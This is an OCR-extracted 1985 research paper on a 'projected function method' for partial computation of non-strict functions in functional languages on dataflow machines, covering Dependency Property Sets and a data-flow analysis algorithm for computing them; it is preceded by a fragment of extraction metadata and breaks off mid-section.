6358, null], [6358, 6621, null], [6621, 8366, null], [8366, 10231, null], [10231, 11506, null], [11506, 13418, null], [13418, 15314, null], [15314, 17203, null], [17203, 19332, null], [19332, 23294, null], [23294, 24735, null], [24735, 26018, null], [26018, 28710, null], [28710, 32079, null], [32079, 33226, null], [33226, 35184, null], [35184, 36335, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1577, true], [1577, 3811, null], [3811, 6358, null], [6358, 6621, null], [6621, 8366, null], [8366, 10231, null], [10231, 11506, null], [11506, 13418, null], [13418, 15314, null], [15314, 17203, null], [17203, 19332, null], [19332, 23294, null], [23294, 24735, null], [24735, 26018, null], [26018, 28710, null], [28710, 32079, null], [32079, 33226, null], [33226, 35184, null], [35184, 36335, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 36335, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 36335, null]], "pdf_page_numbers": [[0, 1577, 1], [1577, 3811, 2], [3811, 6358, 3], [6358, 6621, 4], [6621, 8366, 5], [8366, 10231, 6], [10231, 11506, 7], [11506, 13418, 8], [13418, 15314, 9], [15314, 17203, 10], [17203, 19332, 11], [19332, 23294, 12], [23294, 24735, 13], [24735, 26018, 14], [26018, 28710, 15], [28710, 32079, 16], [32079, 33226, 17], [33226, 35184, 18], [35184, 36335, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 36335, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-24
|
2024-11-24
|
808d25c45940494a20c87c5e0f2d82f6021bdd0a
|
<table>
<thead>
<tr>
<th>Title</th>
<th>Non-Strict Partial Computation with a Dataflow Machine (Software Science and Engineering)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Author(s)</td>
<td>ONO, Satoshi; TAKAHASHI, Naohisa; AMAMIYA, Makoto</td>
</tr>
<tr>
<td>Citation</td>
<td>数理解析研究所講究録 547: 196-229</td>
</tr>
<tr>
<td>Issue Date</td>
<td>1985-01</td>
</tr>
<tr>
<td>URL</td>
<td><a href="http://hdl.handle.net/2433/98839">http://hdl.handle.net/2433/98839</a></td>
</tr>
<tr>
<td>Right</td>
<td></td>
</tr>
<tr>
<td>Type</td>
<td>Departmental Bulletin Paper</td>
</tr>
<tr>
<td>Textversion</td>
<td>publisher</td>
</tr>
</tbody>
</table>
Non-Strict Partial Computation with a Dataflow Machine
Satoshi ONO, Naohisa TAKAHASHI and Makoto AMAMIYA
Musashino Electrical Communication Laboratory
Nippon Telegraph and Telephone Public Corporation
3-9-11 Midoricho Musashino-shi Tokyo 180 Japan
Abstract
This paper proposes a new partial computation method for functional programming languages, named the projected function method. This method makes it possible to execute general partial computation without the pre-binding capability. Pre-binding is essential to the partial computation of non-strict functions in the conventional method, but is quite difficult to implement in dataflow machines.
This paper also presents a new concept named a Dependency Property Set (DPS). The DPS indicates the dependency relation between parameters of functions and result values. This concept plays an important role in the projected function method. An algorithm to compute DPSs based on data flow analysis is also shown.
The projected function method has an excellent conformity with the dataflow computation model. Therefore, this method offers promises for realizing highly-parallel and highly-effective functional programming machines.
Index terms: Functional programming, tabulation, dataflow analysis, dependency analysis, reduction, normalization
1. Introduction
Partial computation is customizing a general program into a more efficient program based upon its operating environment [1]. This concept is useful for pattern matching, syntax analysis, compiler generation and so on [1]. Functional programming languages [2] have clean mathematical semantics, and are especially suitable for automated partial computation. A partial computation algorithm has been discussed for the class of recursive program schemata [3], and attempts have been made to develop partial computation programs for LISP language [4,5].
In contrast to the theoretical or interpreter based approach, machine architecture that can execute partial computation directly has not yet been proposed. The authors have proposed a new dataflow computation model named Generation Bridging Operator (GBO) model, and have provided detailed discussions on one category of the GBO model named the Dynamic-Coloring Static-Bridging (DCSB) model [6]. Although the DCSB model has a parallel partial computation capability, this model is limited only to the partial computation of strict functions [6].
This paper presents a new partial computation method named the Projected Function method. The method makes it possible to execute general partial computation only with the restricted computational power of the DCSB model.
The most important concept in this method is the notion of the Dependency Property Set (DPS). The DPS indicates the dependency relation between parameters of functions and result values. An algorithm to compute DPSs based on the data flow analysis method [7] is also presented.
Dependency Property Set
2. Dependency Property Set
2.1 Functional Programming Language
This sub-section introduces the functional programming language used in this paper. This language is similar to Valid [8], and is the same as the language used by Ono et al.[6].
The factorial function can be defined as follows:
\[
\text{fact} = \left\{ \begin{array}{ll}
\text{if } n=0 \text{ then } 1 \\
\text{else } n \times \text{fact}(n-1)
\end{array} \right.
\]
The above expression is an example of a function definition. The identifier "fact" is a function name, and "n" is a formal parameter. The right-side of the equation (i.e. "\left\{ \begin{array}{ll}
\text{if } ... \\
\text{fi }\right\}"") is referred to as a function, and "if ... fi" is a function body. The name "n" is a formal parameter. If more than one formal parameter exists, they should be separated by a comma, and enclosed by a square bracket such as ":[p1,p2,...,pn]".
Computation is the combination of function applications and simplifications. A function application replaces the function name with its body, and substitutes actual parameters for formal parameters. Some functions are primitive and defined as axioms. Replacing a primitive function application with its resultant value, is called a simplification. In the following, infix operators such as "+", "*", "==" as well as "if-then-else-fi" are assumed to be primitive.
For example, computation of \text{fact}(3) are shown.
\[
\text{fact}(3) = \left\{ \begin{array}{ll}
\text{if } n=0 \text{ then } 1 \\
\text{else } n \times \text{fact}(n-1)
\end{array} \right. (3)
\]
\[
\begin{align*}
&= (\text{if } 3=0 \text{ then } 1 \text{ else } 3 \times \text{fact}(3-1)) \\
&= (3 \times \text{fact}(2)) \\
&= (3 \times (2 \times (\text{fact}(1)))) \\
&= (3 \times (2 \times (1 \times (1)))) \\
&= 6
\end{align*}
\]
Dependency Property Set
A value definition equates its left-side identifier (or a value name) to its right-side expression. A block expression is a sequence of expressions enclosed by "{" and "}". The value of the block expression is determined by a return expression in the block expression. The order of the expressions in a block expression has no meaning. Therefore, in the following example, all expressions have the same meaning:
\[
\begin{align*}
\{ & y=x-1 ; z=y**2 + 2*y + 3 ; \text{return } z \} \\
\{ & z=(x-1)**2 + 2*(x-1) + 3 ; \text{return } z \} \\
\{ & z=y**2 + 2*y + 3 ; y=x-1 ; \text{return } z \}
\end{align*}
\]
(2.1) (2.2) (2.3)
where the expression (2.2) can be obtained by substituting "y" in the expression (2.1) with "x-1", and the expression (2.3) can be obtained by transposing the first and second value definitions in the expression (2.1).
Function names and value names are generically called variables. Identifiers defined in the block expression are named bound variables as are the formal parameters in the function body. The scope of the value/function definitions placed in a block expression is limited to within the block expression. This language adopts the static binding rule. Namely, a free variable in a block expression is bound to the formal parameter of the lexically closest surrounding function definition or to the function/value definition of the lexically closest surrounding block expression [8].
2.2 Computation Rules
A computation rule determines the evaluation order when actual parameters of a function application themselves contain other function applications. The Parallel-Innermost Computation (PIC) rule, and the Parallel-Outermost Computation (POC) rule are especially important for parallel computation.
Dependency Property Set
The PIC rule first selects all actual parameters for evaluation, and then, a function is applied to those parameters. The POC rule first applies a function to unevaluated actual parameters. These parameters are evaluated at the time their values are actually required for expression evaluation.
Hereafter, in an analogy to the case for sequential computation, the PIC rule is called call-by-value, while the POC rule is labeled call-by-name.
2.3 Definition of Dependency Property Set
Sections 2.3 and 2.4 provide the definitions of the DPS and related concepts required in the following discussions. In this paper, primitive functions are always assumed to be monotonous [9], and call-by-name is assumed unless explicitly specified as otherwise.
(1) Requisite parameter
Given a function "f" which takes parameters "x1", "x2", ..., "xn", a parameter "x1" is said to be a requisite parameter of "f", if and only if both of the following conditions are satisfied:
(a) The function "f" is not a totally undefined function. Namely, "f" returns a defined value for some "x1", "x2", ..., "xn".
(b) If "x1" is undefined, "f" is always undefined for any "x2", ..., "xn".
(2) Strict function
A function "f" is said to be strict if and only if all of its parameters are requisite parameters.
For example, primitive arithmetic functions such as "+" (addition), "-" (subtraction), "==" (equality) etc. are strict
dependency Property Set
functions, whereas an "if-then-else-fi" function, a parallel-or
( that returns a "true" when one of the parameters is "true" even if
some parameters are undefined) are non-strict functions.
(3) Sufficient parameter set
Given a function "f" which takes parameters "x1", "x2", ..., "xn". A parameter set \{ x1, ..., xm \} (m ≤ n) of "f" is said to be
sufficient if and only if the function "f" returns a defined value
for some "x1", ..., "xm", even if the rest of parameters "xm+1" ..., "xn" are undefined.
As can be easily shown, the union of sufficient parameter sets
is also a sufficient parameter set, and the requisite parameter of
"f" is always included in any sufficient parameter set of "f".
(4) Minimally sufficient parameter set
Given a function "f" which takes parameters "x1", "x2", ..., "xn", a sufficient parameter set S = \{ x1, ..., xm \} (m ≤ n) is said
to be minimal, if and only if there exists a case such that, for
some "x1", ..., "xm" where the function "f" returns a defined value,
then "f" always becomes undefined when one or more of the parameters
in "S" become undefined.
(5) Dependency property set (basic idea)
A dependency property set (DPS) of a function "f" is a set
which contains all minimally sufficient parameter sets of "f" as
elements. (This definition is extended in the next sub-section.)
For example, suppose that
\[
\text{add}_3 = ^\wedge [x,y,z] \ x+y+z .
\]
Then, all parameters are requisite parameters and a sufficient
parameter set is uniquely determined as \{x,y,z\}. Thus, the DPS of
this function is \{ \{x,y,z\} \}. In general, the DPS of strict
Dependency Property Set
functions consists of only one element that is a set of whole parameters. The DPS of constant functions is \( \{ \{ \} \} \), and the DPS of totally undefined functions is \( \{ \} \).
Consider the non-strict function
\[
\text{if\_func} = \hat{\{[x,y,z] \text{ if } x \text{ then } y \text{ else } z \}}.
\]
In this case, only "x" is a requisite parameter. In addition, \( \{x,y\}, \{x,z\}, \{x,y,z\} \) are sufficient parameter sets, whereas \( \{x,y\}, \{x,z\} \) are minimal. Therefore, the DPS of "if\_func" is \( \{ \{x,y\}, \{x,z\} \} \).
The intersection of all elements in the DPS of "f" is a set of requisite parameters of "f". In addition, if a formal parameter "x" of "f" is not contained in the union of all elements in the DPS of "f", the parameter does not affect the result of "f".
For example, suppose
\[
f = \hat{\{[x,y,z] \text{ if } x>0 \text{ then } x \text{ else } f(x+y,y,x+z) \}}
\]
The DPS of "f" is \( \{ \{x\}, \{x,y\} \} \). The algorithm to compute the DPS will be discussed in Section 4). The intersection of all elements in the DPS is \( \{x\} \), and the union is \( \{x,y\} \). Therefore, "x" is a requisite parameter of "f" whereas "z" is never used in "f".
2.4 The DPSs in Functional Programming
(1) Dependency property set (general)
In the functional programming language described in Section 2.1, the concept of the DPS should be generalized.
[Example 2-1]
\[
\begin{align*}
\{ f=\hat{\{[x,y] \text{ if } x>0 \text{ then } f(x-1,y+1) \text{ else } g(x,y) \}}; \\
g=\hat{\{[x,y] \text{ if } x=0 \text{ then } y \text{ else } f(-x,-y) \}}
\end{align*}
\]
The DPS of "f" depends upon the DPS of "g" as well as the DPS of "f" itself. Following notation is used to describe the DPS of "g(x,y)":
Dependency Property Set
\[(g \{x\} \{y\})\]
where "g" is a function name, and \{x\}, \{y\} are DPSs corresponding to the DPSs of the first and second parameters for "g", respectively. Therefore, the DPS of "f" can be written as:
\[\{x,(f \{x\} \{y\})\}, \{x,(g \{x\} \{y\})\}\]
The DPS can also be defined for expressions.
[Example 2-2]
\[\text{exp} = \{ x = p + q; \ y = x * x; \ \text{return} \ y \}\]
Then, the DPS of "x" is \{p,q\}. The DPS of a block expression is the DPS of its return value. Therefore, the DPS of "exp" is equal to the DPS of "y", and is equal to \{p,q\}.
Formally, the syntax of DPSs can be described as follows:
[Definition 2-1] The syntax of DPSs
\[
\begin{align*}
\text{DPS} & = \{ \text{MSPS-seq} \} \\
\text{MSPS-seq} & = \text{MSPS} | \text{MSPS}, \text{MSPS-seq} \\
\text{MSPS} & = \{ \text{P-seq} \} \\
\text{P-seq} & = \text{P} | \text{P}, \text{P-seq} \\
\text{P} & = \text{value-name} | \text{function-application-form} \\
\text{function-application-form} & = (\text{function-name} \ \text{parameter-DPS-list}) \\
\text{parameter-DPS-list} & = \text{DPS} | \text{DPS} \ \text{parameter-DPS-list} \\
\text{value-name} & = \text{variable} \\
\text{function-name} & = \text{variable} \\
\text{variable} & = \text{IDENTIFIER}
\end{align*}
\]
where the statement "a = x" means that "a" is defined as "x", and the statement "a = x \mid y" means that "a" is defined as "x" or "y".
(2) Tagged DPS (TDPS)
The DPS is an attribute of functions and values. To explicitly declare such relations, tagged DPSs are used.
[Definition 2-2] The syntax of TDPSs
\[
\begin{align*}
\text{TDPS} & = (\text{function-name} \ (\text{formal-parameter-list}) \ \text{DPS}) | \\
& \ \ (\text{value-name} \ "\text{EMPTY}\" \ \text{DPS}) \\
\text{formal-parameter-list} & = \text{formal-parameter} | \\
& \ \ \ \text{formal-parameter formal-parameter-list} \\
\text{formal-parameter} & = \text{variable}
\end{align*}
\]
Dependency Property Set
For example, the DPS of "f" in Example 2-1 is described using a TDPS as follows:
\[ f \ (x\ y) \ \{ \ \{x,(f \ \{\{x\}\ \{\{y\}\}\}\}, \ \{x,(g \ \{\{x\}\ \{\{y\}\}\}\}\} \} \]
Similarly, the TDPS of "x" in Example 2-2 is
\[ (x \ \text{EMPTY} \ \{ \ \{p,q\} \} \]
The leftmost field of a TDPS is called the name of the TDPS.
(3) Dependency environment
To analyze the dependency of variables, it is desirable to gather all the TDPSs visible in a given scope. For this purpose, a set of TDPSs named a dependency environment (DE) is introduced.
[Definition 2-3] The syntax of dependency environments is
\[ \text{DE} = \{ \ \text{TDPS-seq} \} \]
\[ \text{TDPS-seq} = \text{TDPS} \ | \ \text{TDPS}, \ \text{TDPS-seq} \]
For example, the DE of a block in Example 2-1 is
\[ \{ \ (f \ (x\ y) \ \{ \ \{x,(f \ \{\{x\}\ \{\{y\}\}\}\}, \ \{x,(g \ \{\{x\}\ \{\{y\}\}\}\}\} \) , \)
\ (g \ (x\ y) \ \{ \ \{x,y\}, \ \{x,(f \ \{\{x\}\ \{\{y\}\}\}\}\} \) \] \) \] (2.4)
Similarly, the DE of a block in Example 2-2 is
\[ \{ \ (x \ \text{EMPTY} \ \{ \ \{p,q\} \} , \)
\ (y \ \text{EMPTY} \ \{ \ \{x\} \} \) \] \] (2.5)
(4) Normal form of DPSs
The concept of free variables is extended to DEs. A variable "n" of a TDPS "d" is said to be free in the DE "E" if and only if
(a) "n" does not appear in any name of the TDPSs in "E", and
(b) if "d" is a TDPS of a function, "n" does not appear in the formal parameter list of "d".
For example, "p" and "q" in the DE (2.5) shown above are free, whereas "x" is not free.
A TDPS "d" is said to be in a normal form in a DE "E", if and only if
dependency Property Set
(a) if "d" is a TDPS of a function, the DPS of "d" contains only
formal parameters of "d" and free variables in "E".
(b) if "d" is a TDPS of a value, the DPS of "d" contains only
free variables in "E".
A DPS is said to be in the normal form in a DE "E", if and only
if its TDPS is in the normal form in "E". A DE is said to be in the
normal form, if and only if it consists of only normal-form TDPSs.
The normal forms of DEs (2.4) and (2.5) are shown below.
[Normal form of DE (2.4)]
\{
\( f(x,y) \ \{ \{x,y\}\} \),
\( g(x,y) \ \{ \{x,y\}\} \)
\}
[Normal form of DE (2.5)]
\{
\( x \ \text{EMPTY} \ \{ \{p,q\}\} \),
\( y \ \text{EMPTY} \ \{ \{p,q\}\} \)
\}
The algorithm for normalizing DPSs are described in Sections 4.
3. Projected Function Method
3.1 General Partial Computation
The computation described in Section 2.1 requires that all
actual parameters be known (or bound) even though it permits some
actual parameters to remain unevaluated. Thus, it is called total
computation [1]. In contrast, partial computation can proceed even
though some parameters remain unknown *). Such unknown parameters
can be bound after or during the partial computation.
A partial computation algorithm for functional programming
languages (recursive program schemata) has been discussed by Ershov
[3]. The term tabulation in his paper contains both the operations
Projected Function Method
specific to partial computations and a general optimization technique known as tabulation [10]. In addition, when Ershov's approach is used, it becomes rather complicated discussing the limitations of a dataflow machine's computational power. Therefore, to avoid ambiguity and to clarify present discussion, the authors will present their own view on partial computation concepts in functional programming.
Partial computation consists of partial applications, pre-binding applications and partial simplifications.
(1) Partial application
Partial application stands for the application of a function to known parameters and the computation of a function that takes the value of the rest of the parameters (i.e. unknown parameters). This can be achieved by currying [11] known parameters from the function, and then applying these parameters.
For example, suppose that
\[ f = \lbrack x, y \rbrack \ (x+1)*x + y \]
If "x" is known to be 2, then a partial application is possible. The result is as follows:
\[ f_x = \lbrack x \ \lbrack y \ (x+1)*x + y \rbrack \rbrack. \]
\[ f_2 = f_x(2) \]
\[ = \lbrack x \ \lbrack y \ (x+1)*x + y \rbrack \rbrack(2) \]
\[ = \lbrack y \ (2+1)*2 + y \rbrack \]
*) --------------------------------------------------------
Take care to distinguish between "unknown" and "undefined" variables. Unknown variables can be made known at any time by binding values to these variables. On the contrary, undefined is a special state of the known variables. Therefore, the undefined variables remain undefined throughout the entire computation.
projected Function Method
\[ ^{[]}([y] \ 6 + y) \]
The function "fx" is obtained by currying a known parameter "x" from "f". Then, an actual parameter value 2 is applied to "fx", and the result \(^{[]}([y] \ 6 + y)\) is computed.
(2) Pre-binding application
The result of partial applications is a function that takes only unknown parameters. Pre-binding applications are essentially the same as function applications. The difference is that all actual parameters are unknown in pre-binding applications.
For example, suppose that "f2" is the function defined above, and "u" is an unknown variable. Then,
\[
f2(u) = ^{[]}([y] \ 6 + y)(u) = 6 + u
\]
(3) Partial simplification
Partial simplification is the simplification of expressions containing unknown variables. Partial simplification has significance for non-strict primitive functions. As an example, suppose
\[
\text{expr} = (\text{if } x > 0 \ \text{then } x \ \text{else } y \ \text{fi}) + x
\]
and x is known to be 2. Then,
\[
\text{expr} = (\text{if } 2 > 0 \ \text{then } 2 \ \text{else } y \ \text{fi}) + 2 = (\text{if } \text{true} \ \text{then } 2 \ \text{else } y \ \text{fi}) + 2
\]
In this case, the non-strict function if-then-else-fi can be partially simplified. The result is
\[
\text{expr} = 2 + 2 = 4
\]
3.2 Tabulation Technique in Partial Computation
Tabulation (in context of total computation) is a well-known
Projected Function Method
technique to improve the computational efficiency [10]. Tabulation means to keep track of function applications, and to store a return value with the function name and its actual parameters. When the same function application is encountered, the return value can be immediately obtained from the table instead of having to recompute the function application.
The approach presented in this paper adopts a currying operation, and generates functions that take only known parameters. Therefore, tabulation techniques for total computation [10,12] can be easily applied by storing the results of partial applications in tables or lists.
For example, suppose
\[
\text{ack} = \left\{ \begin{array}{ll}
x(y) & \text{if } x=0 \text{ then } y+1 \text{ else} \\
& \left\{ \begin{array}{ll}
0 & \text{if } y=0 \text{ then } \text{ack}(x-1,1) \\
& \text{else } \text{ack}(x-1,\text{ack}(x,y-1))
\end{array} \right.
\end{array} \right.
\]
Then, "ack(0,y)" named "inc" can be computed as follows:
\[
\text{ackx} = \left\{ \begin{array}{ll}
x & \text{if } x=0 \text{ then } y+1 \text{ else} \\
& \left\{ \begin{array}{ll}
0 & \text{if } y=0 \text{ then } \text{ack}(x-1,1) \\
& \text{else } \text{ack}(x-1,\text{ack}(x,y-1))
\end{array} \right.
\end{array} \right.
\]
\[
\text{inc} = \text{ackx}(0) \\
= \left\{ \begin{array}{ll}
y & \text{y+1}
\end{array} \right.
\]
Similarly, "ack(1,y)" named "add" can be computed as follows:
\[
\text{add} = \text{ackx}(1) \\
= \left\{ \begin{array}{ll}
y & \text{if } y=0 \text{ then } \text{ack}(0,1) \\
& \left\{ \begin{array}{ll}
0 & \text{if } y=0 \text{ then } \text{ackx}(0)(1) \\
& \text{else } \text{ackx}(0)(\text{ackx}(1)(y-1))
\end{array} \right.
\end{array} \right.
\]
\[
= \left\{ \begin{array}{ll}
y & \text{if } y=0 \text{ then } \text{inc}(1) \\
& \left\{ \begin{array}{ll}
0 & \text{else } \text{inc}(\text{add}(y-1))
\end{array} \right.
\end{array} \right.
\]
projected Function Method
In the above example, the results of "ackx(0)" and "ackx(1)" are stored in the table (may be constructed using hashing), and the computation process of these results can be shared among other computation of the "ack" function.
General partial computation in functional programming is achieved by the method described in Section 3.1 in accordance with such tabulation techniques for total computation.
3.3 Projection of Functions
(1) Projection of a function
A projection of a function "f" by a parameter set "u" is a partial computation of "f", specifying "u" as unknown parameters and the rest of parameters as undefined.
For examples, suppose that a function "f" is defined as
\[ f = \hat{[x,y,z]} e(x,y,z) \]
where "e(x,y,z)" is an arbitrary expression of "x", "y" and "z". Then, a projection of "f" by \{x\} named "fx" is defined as
\[ fx = \hat{[y,z]} \hat{[x]} e(x,y,z)](w,w) \]
where "w" (please read it "omega" in this paper) stands for an undefined value.
Similarly, a projection of "f" by a parameter set \{x,y\} named "fxy" is defined as
\[ fxy = \hat{[z]} \hat{[x,y]} e(x,y,z)](w) \]
If function applications with undefined parameters appear in the body, these functions must also be projected by the parameter set excluding these undefined parameters. For example, suppose
\[ f = \hat{[x,y]} \text{if } x > 0 \text{ then } x \text{ else } f(x+y,y) \text{ fi} \quad (3.1) \]
Then, a projection of "f" by \{x\} named "fx" is
\[ fx = \hat{[y]} \hat{[x]} \text{if } x > 0 \text{ then } x \text{ else } f(x+y,y) \text{ fi}(w) \]
\[ = \hat{[x]} \text{if } x > 0 \text{ then } x \text{ else } f(x+w,w) \text{ fi} \]
Projected Function Method
Since the primitive function "+" is strict, the function obtained by projecting "+" by the first parameter is a totally undefined function. Thus,
\[ fx = \lceil [x] \text{ if } x>0 \text{ then } x \text{ else } f(w,w) \rceil \]
Then, a projection of "f" by {} named "fw" should be computed.
\[ fw = \lceil [x,y] \lceil [] \text{ if } x>0 \text{ then } x \text{ else } f(x+y,y) \rceil (w,w) \]
\[ = \lceil [] \text{ if } w>0 \text{ then } w \text{ else } f(w+w,w) \rceil \]
\[ = \lceil [] \rceil W() \]
where "W" stands for a totally undefined function. Therefore,
\[ fx = \lceil [x] \text{ if } x>0 \text{ then } x \text{ else } w \rceil \] (3.2)
(2) Projection of a DPS
Given a function "f" which has the DPS "s", assume that a function "fa" is obtained by projecting "f" by a parameter set "a". Then, the DPS of "fa" named "sa" can be computed from "s" and "a" as follows:
(a) If the DPS "s" is the null set, then, so is "sa".
(b) For the case where "s" has elements "ei" (i=1,..,n) (n>0), "sa" is the set of "ei" (i=1,..,n) which satisfies the condition ei ⊆ a (i=1,..,n).
Since "sa" can be computed using only "s" and "a", "sa" is called a projection of "s" by "a".
For example, suppose "f" is the function defined in Expression (3.1). Then, the DPS of "f" named "s" is \{ \{x\}, \{x,y\} \}. The projection of "s" by \{x\} is \{ \{x\} \}. This matches the DPS of "fx" defined in Expression (3.2). Similarly, the projection of "s" by "y" is the null set, indicating that the projection of "f" by "y" (named "fy") is a totally undefined function. This can be confirmed as follows:
\[ fy = \lceil [x] \lceil [y] \text{ if } x>0 \text{ then } x \text{ else } f(x+y,y) \rceil \rceil (w) \]
projected Function Method
\[ = ^{[[y] \text{ if } w > 0 \text{ then } w \text{ else } f(w+y,y) \text{ fi}]}^{[[y] W()]} \]
3.4 Restricted Class of Partial Computation
There exists a computation model which has a restricted partial computational power. For example, the DCSB model has the following limitations:
1. Its computation is based on call-by-value.
2. It cannot perform pre-binding applications.
3. It has only restricted power on partial simplifications.
Limitation (1) can be overcome by introducing a lazy-evaluation mechanism [2] into the dataflow model [13]. Limitations (2) and (3), however, are more substantial, and are difficult to overcome. The origin of these limitations is in the dataflow model itself. In the dataflow model, computation is controlled by tokens that carry data. Normally, such data are the resultant values of previous computation. In a lazy-evaluation context, data are either evaluated values or recipes that are to be evaluated [2]. In any event, tokens must reach a node to initiate computation in that node. Nevertheless, unknown values correspond to the state where a token has not yet reached a node. Therefore, computation is not possible for unknown values.
The limitations (2) and (3) become a serious problem when functions to be computed are non-strict. For example, suppose
\[ f = ^{[[x,y] \text{ if } x > 0 \text{ then } x \text{ else } y \text{ fi}]} \]
\[ e = f(x,u) + x \]
and "x" is known to be 2. Then,
\[ e = f(2,u) + 2 \]
\[ = ^{[[x] ^{[[y] \text{ if } x > 0 \text{ then } x \text{ else } y \text{ fi}]]}(2)(u) + 2} \]
Projected Function Method
\[ ^{[[y] \text{ if } 2 > 0 \text{ then } 2 \text{ else } y \text{ fi}]}(u) + 2 \]
If general partial simplification is possible, the above expression can be simplified as follows:
\[ e = ^{[[y] 2]}(u) + 2 \]
However, such simplification cannot be executed with the DCSB Model [6].
If pre-binding applications are allowed, the expression "e" can be further reduced as follows:
\[ e = 2 + 2 \]
\[ = 4 \]
As shown above, the limitations of the DCSB model significantly confine the partial computation process of programs.
In total computation, call-by-value is widely used, even though it has only a restricted power in contrast to call-by-name. This is because call-by-value exhibits superior execution speed and ease of implementation. Since pre-binding applications are more general in concept than call-by-name applications, it seems reasonable to consider the sub-class of partial computation which excludes pre-binding applications. The following sub-section will present a discussion of the partial computation method under this constraint.
3.5 Projected Function Method for Restricted Partial Computation
Given a function "f" which has the DPS "s", consider the case where "f" is partially computed by the parameter set "a". The projected function method is then defined as the following computation process:
1. Compute the projection of "s" by "a", and name it "sa".
2. If "sa" is null, then, go to Step (5).
3. Compute a projection of "f" by "a", and name it "fa".
Projected Function Method
(4) Totally apply actual values of "a" to "fa". If a defined value is returned, the value is the result of the partial computation. If an undefined value is explicitly returned, then go to Step (5).
(5) If "a" contains at least one requisite parameters of "f", then go to Step (6). Else terminate partial computation of this function application.
(6) Partially apply actual values of "a" to "f",
(7) If the result of Step (6) contains function applications with unknown parameters, partially apply these functions using this method.
For example, consider the example discussed in Section 3.4.
\[
\begin{align*}
f &= \{[x, y] \text{ if } x > 0 \text{ then } x \text{ else } y \text{ fi} \}; \\
e &= f(x, u) + x
\end{align*}
\]
where "x" is known to be 2.
The DPS of "f" is \{ {x}, {x, y} \}, and the projection by \{x\} is \{ {x} \}. Since it is not null, the expression is computed as follows:
Step (1): a projection of "f" by \{x\} named "fx" is computed.
\[
\begin{align*}
fx &= \{[y] \{[x] \text{ if } x > 0 \text{ then } x \text{ else } y \text{ fi} \} \text{ fi} \} (w) \\
&= \{[x] \text{ if } x > 0 \text{ then } x \text{ else } w \text{ fi} \}
\end{align*}
\]
Step (2): "fx" is totally applied to a known parameter.
\[
\begin{align*}
e &= fx(2) + 2 \\
&= \{[x] \text{ if } x > 0 \text{ then } x \text{ else } w \text{ fi} \}(2) + 2 \\
&= (\text{if } 2 > 0 \text{ then } 2 \text{ else } w \text{ fi}) + 2 \\
&= 2 + 2 \\
&= 4
\end{align*}
\]
As shown above, the projected function method makes it possible to execute partial computation without pre-binding applications, at
Projected Function Method
the sacrifice of computational complexity. This method can also be applied to non-strict primitives such as "if-then-else-fi".
The key idea of this method is the concept of the DPS. The next section is devoted for discussing DPSs.
4. Data Flow Analysis for DPSs
4.1 Overview of Data Flow Analysis for DPSs
Figure 4-1 shows the outline of our approach to data flow analysis for obtaining DPSs. The goal of the data flow analysis is to obtain a normal form of DPSs for all functions, which consists of the following two sub-goals. The first is to transform each function into an initial DPS which is obtained through the data flow analysis only in the function body. The second is to obtain the normal form of DPSs by reducing the results of the first sub-goal with the DE where function definitions are placed. The second sub-goal is achieved through a stepwise reduction of DPSs, called the DPS normalization procedure.
Data Flow Analysis for DPSs
In the DPS normalization procedure, three data structures, namely, DPS$, TDPS$ and DE$ are introduced corresponding to DPS, TDPS and DE defined in Section 2.4, respectively. DPS$, which is called a flat form of DPS, is the same as DPS except that all function application forms in DPS are replaced with the symbol "$". After the introduction of DPS$, it is easy to develop TDPS$ and DE$ from the definitions of TDPS and DE, i.e. TDPS$ and DE$ are the same as TDPS and DE, respectively, except that DPS in TDPS is replaced with DPS$, and TDPS in DE is replaced with TDPS$. Using the above three data structures, the DPS normalization procedure can be described as follows.
First, the normal form of each DPS is assumed to be DPS$, and the normal form of DE is also assumed to be DE$. Next, all DPS$ in DE$ are modified with an operation called DPS reduction which replaces each parameter in DPS with DPS$ if TDPS$ of the parameter is in DE$. The DPS reductions for all DPS$ provide new DPS$ and DE$
Data Flow Analysis for DPSs
which become the refined assumptions for normal forms of DPS and DE. Then, all DPS$ are again modified through DPS reduction using DPS$ and DE$ obtained by the preceding DPS reduction. Such a modification continues until all DPS$ converge, i.e. all DPS$ do not change by the DPS reduction. Finally, normal forms of DPSs are obtained by an operation called $\textit{S-elimination}$ which removes Minimally Sufficient Parameter Sets (MSPSs) containing the symbol "$\textit{S}$" from DPS$.
The algorithm of the data flow analysis for obtaining DPSs is described from the bottom up in the following sub-sections in detail, i.e. the DPS reduction, the DPS normalization procedure and the algorithm for transforming a source program to a normal DPS form are described in Section 4.2, 4.3 and 4.4, respectively. Furthermore, examples of the DPS computation described in Section 5 will facilitate an understanding of the algorithm.
4.2 Primitive Operators for the DPS Reduction
In this sub-section, some primitive operators for DPSs are introduced to make it possible to define an algorithm for obtaining DPSs in the following sub-sections.
(1) Primitive set operators
Operators $+$ and $*$ for DPSs provide a union and a Cartesian product for two DPSs, respectively. For example,
$$\{(x,y)\},\{x\}\ +\ \{(x,z)\},\{z\},\{x\}\ =\ \{(x,y)\},\{x\},\{x,z\},\{z\}$$
and
$$\{(x,y)\},\{x\}\ *\ \{(x,z)\},\{z\},\{x\}\ =\ \{(x,y,z)\},\{x,y\},\{x,z\},\{x\}.$$
Data Flow Analysis for DPSs
To facilitate an understanding of a union and a Cartesian product in a set of DPSs, operators $\sum$ and $\prod$ are defined as follows.
\[
\begin{align*}
\sum \text{ DPS}_i & = \text{ DPS}_1 + \sum \text{ DPS}_j \\
& = \text{ DPS}_1 \\
